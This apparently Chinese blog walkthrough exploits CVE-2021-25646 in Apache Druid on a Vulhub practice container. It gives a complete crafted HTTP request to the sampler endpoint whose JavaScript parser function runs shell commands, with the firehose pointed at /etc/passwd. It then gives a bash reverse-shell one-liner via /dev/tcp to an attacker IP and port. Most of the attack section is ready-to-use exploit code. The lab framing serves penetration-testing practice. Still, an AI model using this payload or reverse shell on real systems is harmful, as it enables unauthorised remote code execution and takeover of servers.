Vulhub靶机 Apache Druid(CVE-2021-25646)(渗透测试详解)

一、开启vulhub环境

复制代码
docker-compose up -d  启动
docker ps 查看开放的端口

1、漏洞范围

在Druid0.20.0及更低版本中

二、访问靶机IP 8888端口

1、点击Load data进入新界面后,再点击local disk按钮。

2、进入新界面后,在标红框的Base directory栏写上quickstart/tutorial/,File filter栏写上wikiticker-2015-09-12-sampled.json.gz,写好后点击Preview,再点击Next

3、一直点击Next按钮,直到按钮文字为Next:Filter停止

4、点击Next:Filter按钮,利用Burpsuite抓取该数据包,数据包如下

4、修改数据包为以下数据包

复制代码
POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 912

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}

可见命令执行成功

三、反弹shell

1、修改数据包命令为以下

复制代码
'/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/IP/端口 0>&1'

成功反弹成功

至此,命令执行完成。

下期再见,家人们。

相关推荐
介一安全10 小时前
【APK安全】组件安全核心风险与防御指南
网络安全·安全性测试·apk安全
Elastic 中国社区官方博客13 小时前
CI/CD 流水线与 agentic AI:如何创建自我纠正的 monorepos
大数据·运维·数据库·人工智能·搜索引擎·ci/cd·全文检索
2501_9181269116 小时前
apache 服务器如何使用
运维·服务器·apache
介一安全16 小时前
【APK安全】系统管理器安全风险与防御指南
网络安全·安全性测试·apk安全·android测试
FIN66681 天前
新天力:定制化+创新工艺,解锁食品容器行业无限可能
科技·搜索引擎·产品运营·创业创新·制造
emma羊羊1 天前
【文件读写】绕过验证下
网络安全·php·upload·文件读写
SEO_juper2 天前
AEO 与 SEO 双引擎:整合策略赢得搜索全域可见性
搜索引擎·百度·ai·seo·数字营销·seo优化·aeo
云计算练习生2 天前
Linux 操作系统防火墙工具Firewalld常用操作
服务器·网络·网络安全·防火墙·firewalld·linux操作系统
Whoami!2 天前
4-6〔O҉S҉C҉P҉ ◈ 研记〕❘ WEB应用攻击▸文件上传漏洞-A
网络安全·信息安全·文件上传漏洞·oscp
梦想养猫开书店2 天前
38、spark读取hudi报错:java.io.NotSerializableException: org.apache.hadoop.fs.Path
java·spark·apache